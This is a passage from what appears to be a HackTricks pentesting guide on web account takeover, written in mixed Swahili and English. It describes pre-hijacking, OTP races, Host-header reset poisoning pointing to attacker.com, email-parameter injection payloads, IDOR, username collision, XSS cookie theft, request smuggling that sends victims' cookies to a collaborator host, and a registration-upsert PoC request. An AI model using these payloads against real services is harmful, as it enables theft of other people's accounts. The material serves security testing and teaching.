def handleResponse(req, interesting): if req.status != 401 and b’Invalid’ not in req.response: table.add(req)

</details>

- Try racing verification: submit the same valid OTP simultaneously in two sessions; sometimes one session becomes a verified attacker account while the victim flow also succeeds.
- Pia jaribu Host header poisoning kwenye verification links (sawa na reset poisoning hapo chini) ili leak au kukamilisha verification kwenye host inayodhibitiwa na mshambuliaji.

<a class="content_ref" href="rate-limit-bypass.md"><span class="content_ref_label">Rate Limit Bypass</span></a>

<a class="content_ref" href="2fa-bypass.md"><span class="content_ref_label">2FA/MFA/OTP Bypass</span></a>

<a class="content_ref" href="email-injections.md"><span class="content_ref_label">Email Injections</span></a>

## Account Pre‑Hijacking Techniques (before the victim signs up)

A powerful class of issues occurs when an attacker performs actions on the victim’s email before the victim creates their account, then regains access later.

Mbinu kuu za kujaribu (rekebisha kwa mtiririko wa lengo):

- Classic–Federated Merge
- Mshambuliaji: anasajili akaunti ya classic kwa barua pepe ya mwanaathiriwa na kuweka nenosiri
- Mwanaathiriwa: baadaye anasajili kwa SSO (barua pepe ile ile)
- Merges zisizo salama zinaweza kuacha pande zote zikiwa zimesajiliwa au kuhuisha upatikanaji wa mshambuliaji
- Unexpired Session Identifier
- Mshambuliaji: anaweka akaunti na kuendelea kuwa na session ya muda mrefu (usiichapishe logout)
- Mwanaathiriwa: afufua/atafuta nenosiri na kutumia akaunti
- Jaribu kama vikao vya zamani vinaendelea kuwa halali baada ya reset au kuwezesha MFA
- Trojan Identifier
- Mshambuliaji: anaongeza kitambulisho cha sekondari kwenye akaunti iliyotengenezwa kabla (simu, barua pepe ya ziada, au kuunganisha IdP ya mshambuliaji)
- Mwanaathiriwa: anafanya reset ya nenosiri; mshambuliaji baadaye anatumia trojan identifier kubadilisha/reset/kuingia
- Unexpired Email Change
- Mshambuliaji: anaanzisha mabadiliko ya barua pepe kwenda kwa barua pepe ya mshambuliaji na kushikilia uthibitisho
- Mwanaathiriwa: anapora akaunti na kuanza kuitumia
- Mshambuliaji: baadaye anakamilisha mabadiliko ya barua pepe yaliyokuwa yanangojea ili kuiba akaunti
- Non‑Verifying IdP
- Mshambuliaji: anatumia IdP ambayo haitathibitisha umiliki wa barua pepe ili kudai `victim@…`
- Mwanaathiriwa: anasajili kupitia njia ya classic
- Huduma inaunganisha kwa barua pepe bila kukagua `email_verified` au kufanya uthibitisho wa ndani

Vidokezo vya vitendo

- Kusanya mtiririko na endpoints kutoka kwa web/mobile bundles. Tafuta classic signup, SSO linking, email/phone change, na password reset endpoints.
- Tengeneza automation halisi ili kuendeleza vikao vikiwa hai wakati unajaribu mitiririko mingine.
- Kwa majaribio ya SSO, simamisha test OIDC provider na toa tokens zenye dai la `email` kwa anwani ya mwanaathiriwa na `email_verified=false` ili kukagua kama RP inamwamini IdPs zisizothibitishwa.
- Baada ya password reset au mabadiliko ya barua pepe yoyote, hakikisha kwamba:
  - vikao vingine wote na tokens vimefutwa/kuharibika,
  - uwezo wa mabadiliko ya barua pepe/simu yanayongojea umefutwa,
  - IdPs/barua pepe/simu zilizounganishwa awali zimetathibitishwa upya.

Note: Extensive methodology and case studies of these techniques are documented by Microsoft’s pre‑hijacking research (see References at the end).

<a class="content_ref" href="reset-password.md"><span class="content_ref_label">Reset/Forgotten Password Bypass</span></a>

<a class="content_ref" href="race-condition.md"><span class="content_ref_label">Race Condition</span></a>

## **Password Reset Takeover**

### Password Reset Token Leak Via Referrer <a href="#password-reset-token-leak-via-referrer" id="password-reset-token-leak-via-referrer"></a>

1. Omba password reset kwa anwani yako ya barua pepe
2. Bonyeza kwenye password reset link
3. Usibadilishe nenosiri
4. Bonyeza kwenye tovuti zozote za 3rd party (mf: Facebook, twitter)
5. Intercept the request in Burp Suite proxy
6. Angalia ikiwa referer header ina leak ya password reset token.

### Password Reset Poisoning <a href="#account-takeover-through-password-reset-poisoning" id="account-takeover-through-password-reset-poisoning"></a>

1. Intercept the password reset request in Burp Suite
2. Ongeza au hariri headers zifuatazo katika Burp Suite : `Host: attacker.com`, `X-Forwarded-Host: attacker.com`
3. Forward the request with the modified header\
`http POST https://example.com/reset.php HTTP/1.1 Accept: */* Content-Type: application/json Host: attacker.com`
4. Tazama URL ya password reset inayotokana na _host header_ kama : `https://attacker.com/reset-password.php?token=TOKEN`

### Password Reset Via Email Parameter <a href="#password-reset-via-email-parameter" id="password-reset-via-email-parameter"></a>
```bash
# parameter pollution
email=victim@mail.com&email=hacker@mail.com

# array of emails
{"email":["victim@mail.com","hacker@mail.com"]}

# carbon copy
email=victim@mail.com%0A%0Dcc:hacker@mail.com
email=victim@mail.com%0A%0Dbcc:hacker@mail.com

# separator
email=victim@mail.com,hacker@mail.com
email=victim@mail.com%20hacker@mail.com
email=victim@mail.com|hacker@mail.com

IDOR kwenye vigezo vya API

1. Mshambuliaji lazima aingie kwenye akaunti yao na aende kwenye kipengele cha Badilisha nywila.
2. Anzisha Burp Suite na Intercept the request
3. Tuma kwenye repeater tab na hariri vigezo: User ID/email
   powershell POST /api/changepass [...] ("form": {"email":"victim@email.com","password":"securepwd"})

Token dhaifu la Password Reset

Token ya password reset inapaswa kutengenezwa kwa nasibu na kuwa ya kipekee kila mara.
Jaribu kubaini kama token inaisha (expire) au ikiwa ni ile ile kila wakati; katika baadhi ya kesi algoritimu ya uzalishaji ni dhaifu na inaweza kutabiriwa. Vigezo vifuatavyo vinaweza kutumika na algorithm:

• Timestamp
• UserID
• Email ya mtumiaji
• Jina la kwanza na jina la mwisho
• Tarehe ya kuzaliwa
• Cryptography
• Number only
• Small token sequence ( characters between [A-Z,a-z,0-9])
• Token reuse
• Token expiration date

Leaking Password Reset Token

1. Sababisha ombi la password reset kutumia API/UI kwa email maalum kwa mfano: test@mail.com
2. Angalia response ya server na tafuta resetToken
3. Kisha tumia token kwenye URL kama https://example.com/v3/user/password/reset?resetToken=[THE_RESET_TOKEN]&email=[THE_MAIL]

Password Reset Kupitia Username Collision

1. Jisajili kwenye mfumo kwa username iliyo sawa na username ya mwathiriwa, lakini ukiweka nafasi tupu kabla na/au baada ya username. kwa mfano: "admin "
2. Omba password reset ukitumia username yako ya uharibifu.
3. Tumia token iliyotumwa kwenye email yako na weka upya nywila ya mwathiriwa.
4. Ingia kwenye akaunti ya mwathiriwa kwa nywila mpya.

Jukwaa la CTFd lilikuwa hatarini kwa shambulio hili.
Tazama: CVE-2020-7245

Kupata udhibiti wa akaunti kupitia Cross Site Scripting

1. Pata XSS ndani ya application au subdomain ikiwa cookies zimewekwa kwa parent domain: *.domain.com
2. Leak the current sessions cookie
3. Thibitisha kama mtumiaji ukitumia cookie hiyo

Kupata udhibiti wa akaunti kupitia HTTP Request Smuggling

1. Tumia smuggler kugundua aina ya HTTP Request Smuggling (CL, TE, CL.TE)
   powershell git clone https://github.com/defparam/smuggler.git cd smuggler python3 smuggler.py -h\
2. Andaa ombi litakalobadilisha POST / HTTP/1.1 kwa data ifuatayo:
   GET http://something.burpcollaborator.net HTTP/1.1 X: kwa lengo la kufungua redirect wa wahasiriwa kwenda burpcollab na kuiba cookies zao\
3. Ombi la mwisho linaweza kuonekana kama lifuatalo

GET / HTTP/1.1
Transfer-Encoding: chunked
Host: something.com
User-Agent: Smuggler/v1.0
Content-Length: 83
0

GET http://something.burpcollaborator.net  HTTP/1.1
X: X

Hackerone inaripoti matumizi ya mdudu huu\

• https://hackerone.com/reports/737140\
• https://hackerone.com/reports/771666

Kupata udhibiti wa akaunti kupitia CSRF

1. Unda payload kwa CSRF, e.g: “HTML form with auto submit for a password change”
2. Tuma payload

Kupata udhibiti wa akaunti kupitia JWT

JSON Web Token inaweza kutumika kuthibitisha mtumiaji.

• Hariri JWT kwa User ID / Email nyingine
• Kagua kama saini ya JWT ni dhaifu

JWT Vulnerabilities (Json Web Tokens)

Registration-as-Reset (Upsert on Existing Email)

Baadhi ya signup handlers hufanya upsert wakati email iliyotolewa tayari ipo. Ikiwa endpoint inakubali minimal body yenye email na password na haitekelezi uthibitisho wa umiliki, kutuma email ya mwathirika kutaandika upya password yao kabla ya uthibitisho.

• Ugunduzi: harvest endpoint names from bundled JS (or mobile app traffic), then fuzz base paths like /parents/application/v4/admin/FUZZ using ffuf/dirsearch.
• Vidokezo vya mbinu: a GET returning messages like “Only POST request is allowed.” often indicates the correct verb and that a JSON body is expected.
• Minimal body iliyoshuhudiwa kwa vitendo:

{"email":"victim@example.com","password":"New@12345"}

Mfano wa PoC:

POST /parents/application/v4/admin/doRegistrationEntries HTTP/1.1
Host: www.target.tld
Content-Type: application/json

{"email":"victim@example.com","password":"New@12345"}

Athari: Full Account Takeover (ATO) bila reset token, OTP, au email verification.

Marejeo

• How I Found a Critical Password Reset Bug (Registration upsert ATO)
• Microsoft MSRC – Pre‑hijacking attacks on web user accounts (May 2022)
• https://salmonsec.com/cheatsheet/account_takeover
• Hey there! You are using WhatsApp: Enumerating Three Billion Accounts for Security and Privacy (NDSS 2026 paper & dataset)

Tip

Jifunze na fanya mazoezi ya AWS Hacking:HackTricks Training AWS Red Team Expert (ARTE)
Jifunze na fanya mazoezi ya GCP Hacking: HackTricks Training GCP Red Team Expert (GRTE) Jifunze na fanya mazoezi ya Azure Hacking: HackTricks Training Azure Red Team Expert (AzRTE)

Support HackTricks

• Angalia mpango wa usajili!
• Jiunge na 💬 kikundi cha Discord au kikundi cha telegram au tufuatilie kwenye Twitter 🐦 @hacktricks_live.
• Shiriki mbinu za hacking kwa kuwasilisha PRs kwa HackTricks na HackTricks Cloud repos za github.